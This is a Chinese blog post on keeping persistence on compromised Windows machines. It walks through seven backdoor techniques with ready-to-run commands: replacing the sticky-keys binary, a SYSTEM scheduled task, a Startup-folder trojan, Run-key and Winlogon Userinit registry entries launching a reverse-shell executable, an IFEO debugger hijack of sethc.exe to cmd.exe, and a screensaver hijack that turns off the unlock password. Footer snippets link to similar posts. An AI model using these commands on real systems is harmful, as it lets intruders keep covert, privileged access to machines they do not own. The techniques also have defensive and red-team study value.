windows权限维持

已于 2023-08-08 15:40:40 修改
阅读量87 收藏
点赞数
分类专栏: 内网渗透 文章标签: windows
于 2023-08-08 11:47:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/132160088
版权

一、使用粘滞键

重命名木马文件为sethc

修改权限才能删除粘滞键 

删除粘滞键,并粘贴木马文件

 按五次shift,可以直接启动这个木马文件

二、计划任务 

在计划任务目录中创建目录并写入apprun计划任务

shell schtasks /Create /TN Backdoor /SC minute /MO 1 /TR C:\123\111.exe /RU System /F

 查看是否成启动计划任务

删除计划任务

schtasks /delete /tn "backdoor" /f

 

三、文件夹自启动

位于以下目录中的程序将在指定用户登陆时启动:

c:\users\[username]\appdata\roaming\microsoft\windows\start

使用win+R进入该目录并粘贴木马文件

开机自启成功

四、注册表自启动

打开注册表

命令 所有用户登录时启动

注册表键路径:所有用户登录时启动--08、12复现成功-对应用户权限
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

命令(其他的参考以下):
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\windows\system32\reverse_tcp.exe" /f

 创建成功

重启win2008,成功执行222.exe木马 

 删除命令

shell reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v backdoor /f

 

 

五、winlogon helper-用户登录时启动

修改注册表执行命令userinit

shell reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "c:\windows\system32\userinit.exe,c:\123\333.exe" /f

 查看注册表是否修改成功

成功 

 

六、IFEO映像劫持

注册表添加映像劫持子键创建粘滞键后门

Debugger通过Image File Execution Options注册表添加映像劫持子键创建粘滞键后门(不需要TrustInstaller权限):
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

 连续五次按键shift,可以直接打开命令行窗口

 

七、屏幕保护-普通用户即可

要先开启屏幕保护才可以利用

修改屏保执行程序为恶意程序:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Users\Marcus\reverse_tcp.scr" /f


设置不需要密码解锁:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d "0" /f

将用户不活动时间设置为60秒:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f

Serein_NSQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
win7忘记密码,启动恢复
qq_43180941的博客
08-30 1802
win7忘记密码,启动恢复 第1步 调出BIOS系统(一般是气动系统是长按F8),选择启动启动恢复 第2步 点击取消 第3步 点击 查看问题详细信息 第4步 点击 下方这个红框圈起来的连接地址 第5步 第4步点击后会弹出一个选择文件的框,打开C盘,Windows,System32,找到sethc这个文件 1.把这个sethc改个名字,比如sethc-123 2.把sethc改名之后,再找到cmd, 复制粘贴一份(cmd和sethc文件夹) 3.把你粘贴的“cmd - 副本”重命名sethc
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
后渗透利用sethc留下后门
whoim_i的博客
02-19 7232
目录说在前面什么是sethc?怎么利用?关于sethc权限 说在前面 大家在平常使用电脑办公的时候,手不小心按到了键盘上的某个键,电脑上就会弹出一个框框,叫作是否启用粘滞键,这很影响我们的操作。然而这个东西却存在着巨大的漏洞。 什么是sethc?怎么利用? sethc就是windows中的粘滞键。他的启用方式是按5下shift键,windows就会去找c:\windows\system32\下面...
内网渗透笔记——粘滞键与系统命令信息收集
wang_zui_zui的博客
01-18 730
内网渗透流程 信息收集 → 漏洞利用 → 提权 → 后门 → 痕迹清除 kali系统 linux,集合了非常多的渗透测试工具 利用粘滞键走后门 原理:在注销的界面,连续按shift键,依旧会弹出窗口 归根结底跳出来的是一个程序,如果进行程序的改动,就可以被我们利用。 比如: setch.exe → cmd.exe 操作实现 1、在C盘——Windows——System32路径下找到sethc程序,并尝试进行重命名,发现重命名需要权限。 2、进行所有者的更改 将所有者改为自己
windows sethc漏洞 5次shift获取系统权限
weixin_46128614的博客
03-22 1004
漏洞成因 在未登陆的情况下,可以按下五次shift键启动 sethc程序,同时系统可以在未登录的情况下用system权限打开一个记事本,用记事本打开文件夹,可以将sethc程序换成cmd,进而获取了system权限 复现过程 在win7的启动过程中断电 再次启动进入恢复界面 选择修复 在结果的中可以打开一个记事本 用记事本打开 C:\windows\system找到sethc重命名,然后把...
老掉牙漏洞--关于利用win7/10老版本漏洞绕过密码开机的小实验sethc.exe
weixin_45365048的博客
03-13 1506
一、引言 首先,这个漏洞也具体没查叫什么官方备案是啥,感兴趣的小伙伴可以查查看;其次,这个是疯子看的教学视频随手做的小实验分享过程,不要拿自己的真实机做实验。 二、实验材料 虚拟机开机状态Windows7一台 三、实验过程 1.判断该系统有没有这个”粘滞键“漏洞 在开机输入密码的界面连摁多次shift摁键,如果出现下图情况说明有改漏洞可以利用 2.将虚拟机重启并在开机刚出现win标志的时候用虚拟...
WINDOWS权限维持
qq_58000413的博客
06-07 586
这里可以将计算器路径换为自己的shell后门,这里还需要更换图标,这里稍微有一点缺陷就是会弹出一个黑框框。上传nc,写入注册表开机自启,将cmd给出去留个后门,更改防火墙规则,允许后门端口开放。将administrator的"F"值复制给hack的"F",下面是我已经替换好的。这个方法是执行vbs脚本,这里很容易被杀软拦截,在实验操作的时候需要将杀毒软件关掉。我们导出name中的hack$的注册表,然后导出上面对应的文件夹的注册表。在每次开机或重启的时候都会运行启动文件夹下的程序。然后导入刚才的注册表,
windows权限维持方法详解
国内一线红队,擅长攻防渗透,APT
01-23 3635
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。 权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。
Windows 权限维持手法
qq_53742230的博客
07-20 720
Windows 权限维持手法总结
Telemetry:WINDOWS TELEMETRY权限维持
03-18
本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS ...
权限维持_Windows内核_驱动断链隐藏技术1
08-03
本文将探讨一种高级技术,即在Windows内核层面利用驱动断链隐藏来实现权限维持。这种技术涉及到对操作系统内核机制的深入理解和编程技巧。 首先,恶意驱动文件查找是整个过程的第一步。在红蓝对抗中,蓝队通常会...
046-红队之浅谈基于Windows telemetry的权限维持.pdf
09-20
"红队浅谈基于Windows telemetry的权限维持" Windows Telemetry是一种强大的监控工具,红队可以使用它来维持权限,以下是相关知识点: 一、 Windows Telemetry 简介 Windows Telemetry是Windows操作系统中的一个...
Spring中ConfigurableListableBeanFactory
小湘西的博客
08-20 380
是 Spring Framework 中的一个接口,位于 包中。它扩展了 接口,并提供了更丰富的功能来支持 Spring IoC 容器的配置和管理。支持 Bean 定义的管理: 允许操作和配置 bean 定义,包括注册、修改和查询 bean。自动装配: 支持多种自动装配模式(如按类型、按名称等),帮助开发者更轻松地实现依赖注入。Bean 后处理器: 可以添加 ,以便在 bean 初始化的前后执行特定的应用逻辑。预实例化: 提供方法以预先实例化所有 singleton 类型的 bean,以优化应用程序的
[星瞳科技]OpenMV是否属于单片机?
SingTown_OpenMV的博客
08-20 928
随着代码的增多,在一个文件里的代码会越来越长,越来越难看懂。为了编写可维护的代码,我们把很多函数分组,放到不同的文件里。在Python中,一个.py文件就称之为一个模块(Module)。模块有什么好处?复用代码方便!如果我写了一个模块,你也写了一个模块,我们就有了两个模块。我们把这些模块都组织起来,大家就可以少写很多代码了!之前我们提到了,OpenMV是有文件系统的。文件系统的根目录存在一个main.py,代码执行的当前目录就是根目录。所以我们把模块的文件复制到OpenMV的“U盘”里就可以。
快速上手 STL中 map 和 set 的使用
知其然 知其所以然
08-23 450
快速上手STL中set和map的使用。
【OpenFeign】OpenFeign指定url方式调用
morris
08-23 281
OpenFeign一般是结合注册中心一起使用的,也就是可以通过提供服务的名称而不是url来完成对目标服务的访问。但是出于本地调试的需要,或者考虑到一些简单的服务可能并不需要依赖注册中心,所以本篇我们就讲解一下OpenFeign直接通过目标服务的url进行调用的方式。
csv文件生成与解析
最新发布
liyongbing1122的博客
08-23 102
【代码】csv文件生成与解析。
Windows权限维持技术解析
"“一千零一种”权限维持方法.pdf - 关注Windows权限维持,包括理解、常用方法和安全相关的知识点" 本文档主要讲述了在网络安全领域如何维持对目标系统的长期控制,特别是针对Windows操作系统的权限维持技术。权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值